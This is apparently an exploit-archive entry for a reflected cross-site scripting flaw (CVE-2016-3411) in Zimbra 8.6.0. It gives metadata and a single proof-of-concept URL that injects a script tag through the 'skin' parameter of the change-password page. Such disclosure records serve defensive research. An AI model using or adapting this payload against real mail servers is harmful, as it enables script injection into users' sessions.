[] NeoSense

Zimbra 8.6.0_GA_1153 - Cross-Site Scripting

Author: Dino Barlattani
type: webapps
platform: php
port: 
date_added: 2018-08-10 
date_updated: 2018-08-10 
verified: 0 
codes: CVE-2016-3411 
tags: Cross-Site Scripting (XSS)
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Xss Zimbra Mail server
# Google Dork:
# Date: 2018/08/10
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/

# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411


Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>